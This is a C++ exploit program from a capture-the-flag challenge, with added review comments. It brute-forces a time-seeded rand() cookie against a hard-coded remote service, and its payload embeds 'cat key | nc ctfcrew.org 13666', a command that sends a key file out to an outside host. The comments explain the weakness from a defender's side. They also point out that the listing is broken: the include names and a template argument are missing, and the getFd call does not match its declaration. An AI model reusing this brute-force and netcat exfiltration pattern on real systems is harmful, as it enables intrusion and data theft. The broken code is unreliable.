// NOTE(review): the header names after each #include were lost when this
// listing was extracted (the angle-bracketed names are gone), as was the
// template argument of __gnu_cxx::stdio_filebuf below; the file does not
// compile as shown and the original headers cannot be recovered from here.
#include
#include
#include
#include
#include
#include
#include
#include
#include

using namespace std;

// Opens a TCP connection to the hard-coded remote host/port and returns the
// socket descriptor. The return values of socket(), inet_pton() and connect()
// are never checked, so a failed connection still hands the caller a
// descriptor that it goes on to read from and write to.
int getFd() {
    int sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
    sockaddr_in serv_addr = {};
    serv_addr.sin_family = AF_INET;
    serv_addr.sin_port = htons(4545);
    inet_pton(AF_INET, "54.218.22.41", &serv_addr.sin_addr);
    connect(sock, (sockaddr*)&serv_addr, sizeof(serv_addr));
    return sock;
}

// One attempt of a CTF exploit against the remote service: builds a fixed
// payload, patches a guessed 32-bit cookie into it, base64-encodes it, sends
// it twice and inspects the first five response lines.
//
// The cookie guess is rand() seeded with the caller-supplied `time` value
// (which shadows ::time() inside this function), i.e. the exploit assumes the
// target derived its own cookie from a wall-clock timestamp. From a defender's
// view that is the weakness being exercised: a cookie/canary drawn from a
// time-seeded rand() has only a few thousand plausible values and can simply
// be enumerated, as main() does below. Secrets like this should come from a
// CSPRNG (getrandom()/arc4random()), never from srand(time)/rand().
//
// Returns 0 when the response does NOT contain "HEAP" (treated as success),
// otherwise 1.
//
// NOTE(review): getFd is declared above with no parameters but is called here
// with (inFd, outFd), neither of which exists in this scope; the call as
// written does not compile.
int func(int time) {
    int fd = getFd(inFd, outFd);
    // Two stream buffers over the same descriptor, one for each direction.
    // NOTE(review): libstdc++'s fd-based stdio_filebuf appears to take
    // ownership of the descriptor, so both buffers would close fd when they
    // go out of scope — confirm; a double close is a classic descriptor-reuse
    // bug if another fd is opened in between.
    __gnu_cxx::stdio_filebuf inBuf(fd, ios::in);
    istream is(&inBuf);
    __gnu_cxx::stdio_filebuf outBuf(fd, ios::out);
    ostream os(&outBuf);
    // Fixed payload. Byte 0 is 0x09; bytes from 1 onwards are overwritten
    // with the command string below; the 0x12 0x34 0x56 0x78 run is
    // presumably the placeholder that payload[128..131] replaces with the
    // cookie guess; and the trailing 0xd0 0x10 0x40 0x00 is the little-endian
    // form of 0x4010d0, one of the addresses in the author's trailing comment
    // (target-specific; nothing on this page says what it refers to).
    char payload[] = { 0x09, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x12, 0x34, 0x56, 0x78, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xd0, 0x10, 0x40, 0x00 //4024c0 604b80 4010d0
    };
    // Cookie guess: rand() seeded with the supplied timestamp, stored
    // big-endian at payload[128..131].
    srand(time);
    int cookie = rand();
    payload[128] = (cookie >> 24) & 0xFF;
    payload[129] = (cookie >> 16) & 0xFF;
    payload[130] = (cookie >> 8) & 0xFF;
    payload[131] = cookie & 0xFF;
    // Despite the name this is a shell command string, not machine code; it is
    // copied, NUL terminator included, into payload starting at byte 1.
    const char shellcode[] = "cat key | nc ctfcrew.org 13666";
    copy(shellcode, shellcode + sizeof(shellcode), payload + 1);
    // base64-encode the raw payload. base64::encoder is a third-party encoder,
    // not part of the standard library; its output is line-wrapped, so the
    // lines are re-joined into a single string below.
    stringstream ss(ios::in | ios::out | ios::binary);
    ss.write(payload, sizeof(payload));
    stringstream ssOut;
    base64::encoder encoder;
    encoder.encode(ss, ssOut);
    string payloadString;
    // NOTE(review): testing eof() before getline() is the classic off-by-one
    // loop shape; the final iteration appends an empty buf, which is harmless
    // here because an empty string adds nothing.
    while (false == ssOut.eof()) {
        string buf;
        getline(ssOut, buf);
        payloadString += buf;
    }
    // The encoded payload is written twice; the page does not say why.
    os << payloadString << endl;
    os << payloadString << endl;
    // Read the first five response lines. getline() failures (EOF, closed or
    // never-connected socket) are not checked, so a dead connection yields
    // five empty lines and falls into the "no HEAP" branch below, which
    // main() then misreads as success.
    string result;
    for (int i = 0; i != 5; ++i) {
        string buf;
        getline(is, buf);
        result += buf + "\n";
    }
    // Absence of "HEAP" in the reply is treated as success — presumably the
    // service prints a heap-related error when the cookie check fails; that
    // is inferred from this test alone, the page does not show the service.
    if (string::npos == result.find("HEAP")) {
        cout << result << endl;
        cout << payloadString << endl;
        return 0;
    }
    return 1;
}

// Entry point: enumerates candidate seeds from (now - 60) to (now + 3539),
// calling func() once per candidate and stopping at the first attempt that
// returns 0; prints "fail" after 3600 attempts. Each attempt opens a fresh
// connection, so a run can mean thousands of connections from one source in
// quick succession — a pattern a defender can rate-limit or alert on.
// NOTE(review): time_t is narrowed to int here (year-2038 issue), and because
// func() returns 0 on a dead connection the loop can stop on the very first
// attempt without the service ever having answered.
int main() {
    int t = time(NULL) - 60;
    for (int i = 0; i != 3600; ++i) {
        cout << i << endl;
        int r = func(t + i);
        if (0 == r) {
            return 0;
        }
    }
    cout << "fail" << endl;
    return 0;
}